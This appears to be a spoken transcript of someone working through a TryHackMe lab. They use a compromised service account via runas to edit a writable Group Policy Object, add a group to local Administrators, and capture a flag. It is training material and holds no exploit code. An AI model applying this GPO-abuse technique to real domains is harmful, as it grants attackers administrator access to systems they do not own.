All right, so we have to run the command thing as a administrator. Is our guy able to do that? I guess so. No. Oh wait, no, that is what we want. AD username Jack.Hussein. Wah. 2 S's. Then cmd.exe, very important. How do I feel about this? Once prompted, provide the password associated with the account. To verify that you provide the correct credentials, you can run dir's tryhackme.sysvol. In the newly spawned command prompt window, we can start the Microsoft Management Console, MMC. Then we're going to add the group policy management snap-in. Click File, Add, Remove, Snap-in. Okay, we're not there yet. Let's not get too ahead of ourselves. Why is that thing in the background running? Okay, whatever. I'm not going to question it. Where's our... Once prompted, provide the password. To verify that you provided the correct credentials, you can... Okay, from which window? Does it matter? Let's try from this one. What's the worst that could happen? See, now I'm using Control-Shift-C wherever I go. Had a 50-50 chance, and I got it wrong. In the newly spawned command prompt window, we can start the Microsoft Management Console. Cool. File. Add, remove, snap-in. Group policy management, snap-in. Okay, there's 2 that go by a similar name here. Management editor, no, management, and click add and click OK. Group policy management, add, OK. The specified domain controller cannot be contacted. This affects the following domain in the console. There was access is denied. Choose a different domain controller, retry. Yeah. Let's just run it again, see what happens. You think so? I'm inclined to agree. Let's make sure I have it right from here. Okay, it looks correct. I mean, would we even get this prompt if run S didn't work? Run as administrator. Let's try the run as command again. I stopped using CMD a while ago, and when I do use it, it's inside Windows Terminal, so I don't recall if it says administrator in the title bar or not when it's run with elevated privileges. Yeah. Correct credentials. How would I get that wrong? Are we supposed to be using... somebody else's username? I think we're supposed to be using service, serviceman or serviceman credentials for this. Okay, just let me leave. Just let me leave. Whoa. I didn't want to do all that. And I'm too lazy to retype everything, so. Because remember what I was saying, why would we inject the credentials if we already have his password? You know what I'm saying? So I think we're supposed to use CVSC serveman, and I'm a little embarrassed that I didn't think of this as a possible solution earlier. Nope. Because that's kind of the whole point, isn't it? Although nothing is. I remember last time I had to be like several spaces out here. That I'm feeling not confident about copying and pasting that there. Copy. Paste. You know, it might just pop up the console regardless of whether or not get her right, because that did not feel like I got it right that time. Add, remove, snap in, group policy, manager, management, add, okay. So it seems like it worked. All right. You should now be able to see GPOs for the za.tryhackme.com domain. No error, and yet I still don't feel super. I'm feeling better now that we're getting somewhere here. I don't know, it just didn't feel right, even though it seems to be working out right. Yeah, I should have figured that out right away. We can now navigate to the GPO that has our permissions to modify. Servers, management server pushes. Just like we saw in Bloodhound. Servers, management server pushes. Global to the GPO. I think that's what I want to do. Okay, now what? No, don't. Alright. You can right click on the GPO and select edit. This will now open the new group policy management editor window. We're supposed to right click on it? What? Okay. No, go. What? Come back. Oh. Panic there. Unnecessarily. In order to add our account to the local groups, we need to perform the following steps. Expand computer configuration, expand policies, expand window settings, expand security settings, Right-click on restricted groups and select add group. If the IT support group already exists, it means somebody has already performed the exploit. You can either delete it to create it yourself or just inspect it to see what was configured. Click browse, enter IT support, and check names. Click OK twice. The first filter is not used. For the second filter, I want to add both admin. You know what? I'm not going to. Let's do this one at a time. Expand computer configuration. It is already expanded. Expand policies. I have done so. Expand Windows settings. Security settings. Restricted groups. Oh, just go into the restricted groups. And select add group. If the IT support group already exists, it does. Somebody has beat us to it. You can either delete it to create it yourself. Click browse, enter IT support, and check names. Click browse. Where's browse? Click on it. Where's add? I'm not seeing add. You know, I'm gonna go ahead and delete it and create our own. Sorry, whoever created this. Okay, so I can right click and I think you gotta right click in the white space. Add group. IT. Click OK. Yeah, so the browser is only available if we're creating it. Click browse. Wait. No, the other one said Z-A-A-T-I-T. Okay, let's try again. Yes. Right click on restricted groups. Yes, I've done so. Add group. There we go. IT. That's weird that it gives you two different... No, it's the same. Did I hit OK before I hit browse? I think that's what I did, right? Enter IT support. And click check names. Click OK twice. Oh God. Type IT support and click the browse button to auto-populate it. Got it. Done. And then enter the object name to select. Enter IT support and check names. Got it. We're back on track. First filter is not used. For the second filter, we want to add both the administrators and O. All right, so I can do this here. This is a group of. This group is a member of administrators. What happens if I spell it wrong? I'd feel more comfortable if it would auto-suggest stuff. No problem. Yep, these things look similar. Maybe we shouldn't hit apply yet. Let me read a little further. Once the configuration has been made, we can apply and clip-apply. We can clip-apply. I will clip-apply now. And then click OK. Now all we need to do is wait for a maximum of 15 minutes for the GPO to be applied. After this, our initial account that we made a member of the IT support group, our initial account does that mean the Jack Hussein? Do we just make our Jack Hussein guy or the serviceman? All right, we can answer some of these while we wait. What object allows users to configure Windows policies? It's either group policy object or that's it. All right. What AD feature allows us to configure GPOs for the entire AD structure? It's got to be group something. Management. Okay. What is the name of the GPO that our compromised AD account owns? What is the name of the GPO that our restricted... or management server. Management server pushes. Management server pushes. No, it's correct. You're wrong. It's the exact same. I told you I was right. Stupid computer. What's the value of the flags stored on THM Server 2 in the administrator's desktop directory? Alright, we're almost there. I'm glad we decided to go through with this. I think I need to research run as so I fully understand it. I think the fact that I didn't know I was supposed to put in serviceman's credentials means I have a tenuous grasp on exactly how run as works. I know you're injecting credentials, but the stupid thing is too, I was like, why are we injecting Jack Hussein's credentials? And the answer is, we're not. All right, let's see how, I'm assuming we just SSH in. What's our guy's real name? Full name? SVC Surfman. Look at me using Control-Shift-C like a pro. And we don't want THM work. We want THM server 2? Yes. And was there more stuff we had to put in, or is this good to go? This is the moment of truth. Oh, no longer a pro. Holy cow, we did it! I got something right. You know what that deserves? You know what, we've had too many Hack the Planets. Let's hear from Razor and Blade.
Hackers of the world unite.
Hackers of the world unite. Alright, CD... Wait. Yeah, CD... That's not a D. CD... Close enough. It gave it to me. CD users. Oh, it's already there. Dir CD administrator. Oh, that's not good. Are we on the wrong server? I think I spoke too soon. I'm hoping I just misspelled it. Is it ZA? No, it's not. Obscenity, we got pretty far, but I think I may have screwed up the GPO parameters. But if that were the case, let's reread this a little bit. Oh, maybe we have to wait a maximum of 15 minutes yet. It has not been 15 minutes, yeah? Alright. We should be off. I think okay. My new take on this is that we were successful, but we are impatient. Yeah, usually they tell us to do that though, if that's possible, but I don't like to wait, so. What did I do wrong? Oh. I've misspelled this previously. I don't know why. So we should be authorized, but oh wait, can I just do history so I make sure I don't misspell it? the danger is that we wait 15 minutes and it's still not working. I don't always trust GPU GP update. Group policy update, right? Not GPU. How do I reboot? Sudo. Just kidding. Are we okay with this? It's not gonna screw anything up? I mean, are we sure that it will reboot? If I shut it down, are we sure it will come back up? I'm just going to do this for the next 12 minutes. Uh-oh. I'm kind of hesitant to do anything further other than wait, just because I feel like anything that can go wrong will go wrong. I have a negative field effect that ensures that not only will everything go wrong, but it'll go wrong in a million different ways. But we did all this right? This we did correctly. I feel like it, right? I shouldn't have deleted it. I should have just inspected it to see what was configured. Yeah, I feel like it went okay. Click browse, enter IT support. I'm sure there's a picture for this one. An hour? Trying to crack what this means. There's three-letter words here. So I'm guessing it has to be... Let's bring up my notes real quick. This will be a fun game we can play in the meantime. No, it's always like, oh. Okay. I'm willing to try just about anything. Let's see if we can just crack the flag. So it's going to be THM bracket, not okay, brackets. It's going to be relevant to the lesson. First word is 3, 6, looks like 9 letters. Next one is 4, and then the next 3 are each 3 letters. And the last one is 6 letters. So, my guess, I think the last 3 words are going to be the GPO object. Does that track? The.gpo.object is 6 letters. The GPO. But what would become before the GPO? I'm guessing the 4-letter word is push. What'd I miss? Obscenity. It seems like you are onto something. Oh, you want me to change the command there? All right. Yeah, I'm just noticing that too. Alright, I'm kind of tempted to just try to do that all again from the time that we're... Well, there's no 2-letter words there. The periods mean... are the breaks between the... Usually they're underscores, though. I'm pretty sure the last 3 letters are the GPO object. They're kind of hard to read. Yeah, I think the first one is actually 10, so I think I got that first one wrong. 1, 2, 4, 5, 6, 7, 8, 9, 10. I'm gonna try something. Scan the following. Tell me which 10-letter word reoccurs the most. Yeah. Okay. So I initially dismissed management because I thought the word was 9 letters. Oh, that's right. This room is exploiting, right? Or this task. I guess GPO object is redundant, right? Alright. Yeah, it's exploiting GPOs. I'm guessing that is correct. Exploiting GPOs for fun. And is profit 6 letters? It is. We figured it out, guys. That's what it is. See, there's always another way in. I'm gonna be so upset if this is not correct. Oh, come on. No, it's gotta be correct. What did I do wrong? Exploiting GPOs. Is it supposed to be periods for sure? It's always underscores, isn't it? There's got to be a typo here. All right. I thought the periods were supposed to stand for underscores. That's so crazy.
Hack the flag! Hack the flag!
All right, I'm